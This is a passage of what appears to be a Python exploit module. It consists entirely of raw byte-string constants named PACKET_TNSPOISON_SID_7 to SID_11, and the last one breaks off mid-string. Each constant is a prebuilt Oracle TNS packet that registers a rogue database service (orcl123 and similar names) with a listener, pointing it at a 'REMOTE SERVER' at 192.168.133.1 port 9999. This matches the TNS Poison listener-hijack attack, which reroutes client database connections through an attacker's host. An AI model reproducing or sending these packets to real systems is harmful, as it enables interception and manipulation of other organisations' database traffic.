x00\x00\x00\x00\x00\x00\xd0\x91T2\xff\x07\x00\x001\x00\x00\x00\x00\x00\x00\x00\xfcfM\x0b\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x04\x10\x00\x00\x01\x00\x00\x00\\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x97A\x0b\x00\x00\x00\x00D000\x00(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.133.1 )(PORT=49196))\x00DISPATCHER <machine: 192.168.133.1 , pid: 2528>\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd0\xfb-\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90\x99-\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x84\x06\x1eu\xbcUG\xe6\xac\x95\xa4\x0c\xac\x8d\x1ac8)D2\xff\x07\x00\x00\n\x00\x00\x00\x00\x00\x00\x00,T{G\x01\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00xEl2\xff\x07\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf0y{G\x01\x00\x00\x00\x14\x00\x00\x00\x95\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00X\xcfj2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xb8\xfb-\x0b\x00\x00\x00\x00DEDICATED\x00(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.133.1 )(PORT=9999))\x00REMOTE SERVER\x00\n\x00\x00\x00\x00\x00\x00\x00`)D2\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fA\x0b\x00\x00\x00\x00orcl12XDB\x00\x10\xcfj2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x008\xcfj2\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc-\x0b\x00\x00\x00\x00orcl12\x00\x00\x00'
PACKET_TNSPOISON_SID_7 = b'\x05\x9e\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05\x94$\x08\xff\x03\x01\x00\x1244xx4x\x10\x102\x102\x102Tv\x102\x102Tv\x00x\x102Tv\x00\x00H\x00\x00\x80\x02\x00\x00\x00\x00\x04\x00\x00\xc0\xe9\x81\x0c\x00\x00\x00\x00\x90\x00#\x00\x00\x00BEC76C2CC136-5F9F-E034-0003BA1374B3\x03\x00e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x05\x00\x80\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x80\xf5 \x0b\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0\x00|\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc8\xa8\x80\x0c\x00\x00\x00\x00\x02=\xd3\xc4\x7f!IA\x87[%\x8b\t/\x1au\x08\x00\x00\x00\x00\x00\x00\x00\xd0El2\xff\x07\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x88\x02|\x0c\x00\x00\x00\x00\n\x00\x00\x00d\x00\x00\x00\x01\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\xf5 \x0b\x00\x00\x00\x00orcl123\x00(HOST=192.168.133.1 )\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x98\xc6\xbf,\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00p\xc6\xbf,\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X\xa7\x80\x0c\x00\x00\x00\x00orcl123XDB\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x98\xc6\xbf,\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8f\x80\x0c\x00\x00\x00\x00orcl123XDB\x00\x01\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x008\xcfj2\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x10\xcfj2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xa6\x80\x0c\x00\x00\x00\x00orcl123\x00\x08\x00\x00\x00\x00\x00\x00\x008\xcfj2\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc \x0b\x00\x00\x00\x00orcl123\x00\x01\x00\x00\x00E\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xd0\x80E2\xff\x07\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00Pf|\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\xa9\x80\x0c\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00E\x00\x00\x00\x00\x00\x00\x00\xd0\x80E2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\xa5\x80\x0c\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xb8\x97\x80\x0c\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90f|\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xa8\x80\x0c\x00\x00\x00\x00a!\xb8\xfe\\xa0 i\xc9MY\x8c\xf4\x05\x00\x00\x00\x00\x00\x00\x00`*_.\xff\x07\x00\x00;\x00\x00\x00\x00\x00\x00\x00\xd0\x91T2\xff\x07\x00\x000\x00\x00\x00\x00\x00\x00\x00\xfcf|\x0c\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x04\x10\x00\x00\x01\x00\x00\\xc6\xbf,\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x97\x80\x0c\x00\x00\x00\x00D000\x00(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.133.1 )(PORT=49200))\x00DISPATCHER <machine: 192.168.133.1 , pid: 376>\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd0\xfb \x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90\x99 \x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x86\xc7\x00?blNr\x8b3\xc6E\xea\xd1d\xd4p\xc6\xbf,\xff\x07\x00\x00\n\x00\x00\x00\x00\x00\x00\x00,T{G\x01\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00xEl2\xff\x07\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf0y{G\x01\x00\x00\x00\x03\x00\x00\x00\x95\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00X\xcfj2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xfb \x0b\x00\x00\x00\x00DEDICATED\x00(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.133.1 )(PORT=9999))\x00REMOTE SERVER\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x98\xc6\xbf,\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8f\x80\x0c\x00\x00\x00\x00orcl123XDB\x00\x10\xcfj2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x008\xcfj2\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc \x0b\x00\x00\x00\x00orcl123\x00'
PACKET_TNSPOISON_SID_8 = b'\x05\xa6\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05\x9c$\x08\xff\x03\x01\x00\x1244xx4x\x10\x102\x102\x102Tv\x102\x102Tv\x00x\x102Tv\x00\x00H\x00\x00\x80\x02\x00\x00\x00\x00\x04\x00\x00X\xeaI\x0b\x00\x00\x00\x00\x90\x00#\x00\x00\x00BEC76C2CC136-5F9F-E034-0003BA1374B3\x03\x00e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00$\x05\x00\x80\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00x\xf5\xcc\n\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0\x00B\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xa9H\x0b\x00\x00\x00\x00\xb0"\xc8\x9c\r-B\xda\x93U\x97\xfd\x85aY\x8d\t\x00\x00\x00\x00\x00\x00\x00\xc8El2\xff\x07\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x88\x02B\x0b\x00\x00\x00\x00\x0b\x00\x00\x00d\x00\x00\x00\x03\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\n\x00\x00\x00`\xf5\xcc\n\x00\x00\x00\x00orcl1234\x00(HOST=192.168.133.1 )\x00\x01\x00\x00\x00\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x10SC2\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe8RC2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\xa8H\x0b\x00\x00\x00\x00orcl1234XDB\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x10SC2\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fH\x0b\x00\x00\x00\x00orcl1234XDB\x00\x01\x00\x00\x00\t\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00h\xd4i2\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\\xd4i2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\xa7H\x0b\x00\x00\x00\x00orcl1234\x00\t\x00\x00\x00\x00\x00\x00\x00h\xd4i2\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x10\xfc\xcc\n\x00\x00\x00\x00orcl1234\x00\x01\x00\x00\x00E\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00(\xa7\x9c,\xff\x07\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00PfB\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X\xaaH\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00E\x00\x00\x00\x00\x00\x00\x00(\xa7\x9c,\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xa6H\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xa8\x97H\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90fB\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xa8H\x0b\x00\x00\x00\x00\xf0\x97\x10e,\xdeC\x06\x95:\xf5i\x19B\xa1\x8c\x05\x00\x00\x00\x00\x00\x00\x00`*_.\xff\x07\x00\x00;\x00\x00\x00\x00\x00\x00\x00\xc0\x91T2\xff\x07\x00\x001\x00\x00\x00\x00\x00\x00\x00\xfcfB\x0b\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x04\x10\x00\x00\x01\x00\x00\x00\xb8RC2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x90\x97H\x0b\x00\x00\x00\x00D000\x00(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.133.1 )(PORT=49173))\x00DISPATCHER <machine: 192.168.133.1 , pid: 2552>\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xc8\xfb\xcc\n\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x88\x99\xcc\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x005\x14\xfa6\xc2\x96B\xcd\xb4\xfdwN\xb6\x04Z\xb8\xe8RC2\xff\x07\x00\x00\n\x00\x00\x00\x00\x00\x00\x00,T{G\x01\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00pEl2\xff\x07\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf0y{G\x01\x00\x00\x00\x1b\x00\x00\x00\x95\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x90\xd4i2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xb0\xfb\xcc\n\x00\x00\x00\x00DEDICATED\x00(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.133.1 )(PORT=9999))\x00REMOTE SERVER\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x10SC2\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fH\x0b\x00\x00\x00\x00orcl1234XDB\\xd4i2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\x00\x00\x00\x00h\xd4i2\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x10\xfc\xcc\n\x00\x00\x00\x00orcl1234\x00'
PACKET_TNSPOISON_SID_9 = b"\x05\xae\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05\xa4$\x08\xff\x03\x01\x00\x1244xx4x\x10\x102\x102\x102Tv\x102\x102Tv\x00x\x102Tv\x00\x00H\x00\x00\x80\x02\x00\x00\x00\x00\x04\x00\x00\x98\xe9Z\x0b\x00\x00\x00\x00\x90\x00#\x00\x00\x00BEC76C2CC136-5F9F-E034-0003BA1374B3\x03\x00e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00,\x05\x00\x80\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x80\xf5\xdc\n\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0\x00M\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xa8Y\x0b\x00\x00\x00\x00Bm\x0eck\x8aA\x92\xafG\xbc\xa8>X\xd0U\n\x00\x00\x00\x00\x00\x00\x00\xc8E\xac%\xff\x07\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x88\x02M\x0b\x00\x00\x00\x00\n\x00\x00\x00d\x00\x00\x00\x01\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\xf5\xdc\n\x00\x00\x00\x00orcl12345\x00(HOST=192.168.133.1 )\x00\x01\x00\x00\x00\r\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00p\xab\x8a%\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00H\xab\x8a%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\xa7Y\x0b\x00\x00\x00\x00orcl12345XDB\x00\r\x00\x00\x00\x00\x00\x00\x00p\xab\x8a%\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fY\x0b\x00\x00\x00\x00orcl12345XDB\x00\x01\x00\x00\x00\n\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xa8\xd9\xa8%\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x80\xd9\xa8%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\xa6Y\x0b\x00\x00\x00\x00orcl12345\x00\n\x00\x00\x00\x00\x00\x00\x00\xa8\xd9\xa8%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc\xdc\n\x00\x00\x00\x00orcl12345\x00\x01\x00\x00\x00E\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x08\x9c\xfa\x1f\xff\x07\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00PfM\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X\xa9Y\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00E\x00\x00\x00\x00\x00\x00\x00\x08\x9c\xfa\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xa5Y\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xa8\x97Y\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90fM\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xa7Y\x0b\x00\x00\x00\x00(\xee\x94\x07\x12\nK\x99\x9bA\x91\x9f'-\x94\xe0\x05\x00\x00\x00\x00\x00\x00\x00`Z\xf6!\xff\x07\x00\x00;\x00\x00\x00\x00\x00\x00\x00\xc0\x91\x94%\xff\x07\x00\x001\x00\x00\x00\x00\x00\x00\x00\xfcfM\x0b\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x04\x10\x00\x00\x01\x00\x00\x00\x18\xab\x8a%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x97Y\x0b\x00\x00\x00\x00D000\x00(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.133.1 )(PORT=49206))\x00DISPATCHER <machine: 192.168.133.1 , pid: 
1336>\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd0\xfb\xdc\n\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90\x99\xdc\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=iA\x97\xbd\xdbD*\xa7L\x940V\xa3Q\xd4H\xab\x8a%\xff\x07\x00\x00\n\x00\x00\x00\x00\x00\x00\x00,T{G\x01\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00pE\xac%\xff\x07\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf0y{G\x01\x00\x00\x00\x05\x00\x00\x00\x95\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\xd0\xd9\xa8%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xfb\xdc\n\x00\x00\x00\x00DEDICATED\x00(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.133.1 )(PORT=9999))\x00REMOTE SERVER\x00\r\x00\x00\x00\x00\x00\x00\x00p\xab\x8a%\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fY\x0b\x00\x00\x00\x00orcl12345XDB\x00\x80\xd9\xa8%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x00\x00\x00\x00\x00\x00\xa8\xd9\xa8%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc\xdc\n\x00\x00\x00\x00orcl12345\x00\x00"
PACKET_TNSPOISON_SID_10 = b'\x05\xb6\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05\xac$\x08\xff\x03\x01\x00\x1244xx4x\x10\x102\x102\x102Tv\x102\x102Tv\x00x\x102Tv\x00\x00H\x00\x00\x80\x02\x00\x00\x00\x00\x04\x00\x00\x18\xea>\x0b\x00\x00\x00\x00\x90\x00#\x00\x00\x00BEC76C2CC136-5F9F-E034-0003BA1374B3\x03\x00e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x004\x05\x00\x80\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x80\xf5 \x0b\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0\x00F\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\xa9=\x0b\x00\x00\x00\x00\x11\xe3\n\xfc|_CX\x90\xa9\xb6\xc76H7\xa6\x0b\x00\x00\x00\x00\x00\x00\x00\xc8E\xac%\xff\x07\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x88\x02F\x0b\x00\x00\x00\x00\n\x00\x00\x00d\x00\x00\x00\x01\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00h\xf5 \x0b\x00\x00\x00\x00orcl123456\x00(HOST=192.168.133.1 )\x00\x01\x00\x00\x00\x0e\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x10S\x83%\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe8R\x83%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\xa7=\x0b\x00\x00\x00\x00orcl123456XDB\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x10S\x83%\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8f=\x0b\x00\x00\x00\x00orcl123456XDB\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00h\xd4\xa9%\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\\xd4\xa9%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x008\xa7=\x0b\x00\x00\x00\x00orcl123456\x00\x0b\x00\x00\x00\x00\x00\x00\x00h\xd4\xa9%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc \x0b\x00\x00\x00\x00orcl123456\x00\x01\x00\x00\x00E\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xf8Y\xf1\x1f\xff\x07\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00PfF\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\xaa=\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00E\x00\x00\x00\x00\x00\x00\x00\xf8Y\xf1\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\xa6=\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xa8\x97=\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90fF\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa8\xa8=\x0b\x00\x00\x00\x00\xcdUa\xa1\xe4\x95I\xf7\xb8}hE\xcc\xf6\xd3\xe2\x05\x00\x00\x00\x00\x00\x00\x00`Z\xf6!\xff\x07\x00\x00;\x00\x00\x00\x00\x00\x00\x00\xc0\x91\x94%\xff\x07\x00\x000\x00\x00\x00\x00\x00\x00\x00\xfcfF\x0b\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x04\x10\x00\x00\x01\x00\x00\x00\xb8R\x83%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x97=\x0b\x00\x00\x00\x00D000\x00(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.133.1 )(PORT=49210))\x00DISPATCHER <machine: 192.168.133.1 , pid: 312>\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd0\xfb \x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90\x99 \x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdf4\xad\xc8\x02"Lx\xb8\xcc\x18\xd4*B\xe1\xe9\xe8R\x83%\xff\x07\x00\x00\n\x00\x00\x00\x00\x00\x00\x00,T{G\x01\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00pE\xac%\xff\x07\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf0y{G\x01\x00\x00\x00\x14\x00\x00\x00\x95\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x90\xd4\xa9%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xb8\xfb \x0b\x00\x00\x00\x00DEDICATED\x00(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.133.1 )(PORT=9999))\x00REMOTE SERVER\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x10S\x83%\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8f=\x0b\x00\x00\x00\x00orcl123456XDB\\xd4\xa9%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00h\xd4\xa9%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc \x0b\x00\x00\x00\x00orcl123456\x00\x00\x00\x00'
PACKET_TNSPOISON_SID_11 = b'\x05\xba\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05\xb0$\x08\xff\x03\x01\x00\x1244xx4x\x10\x102\x102\x102Tv\x102\x102Tv\x00x\x102Tv\x00\x00H\x00\x00\x80\x02\x00\x00\x00\x00\x04\x00\x00\x98\xe9l\x0c\x00\x00\x00\x00\x90\x00#\x00\x00\x00BEC76C2CC136-5F9F-E034-0003BA1374B3\x03\x00e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x008\x05\x00\x80\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x80\xf5"\x0b\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0\x00?\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xa8k\x0c\x00\x00\x00\x00\x8aZ!\x19\x1e\xa5C\xe6\xbb\xb9\xca\xb5\xb9J0y\x0c\x00\x00\x00\x00\x00\x00\x00\xc8E\xac%\xff\x07\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x88\x02?\x0c\x00\x00\x00\x00\n\x00\x00\x00d\x00\x00\x00\x01\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\xf5"\x0b\x00\x00\x00\x00orcl1234567\x00(HOST=192.168.133.1 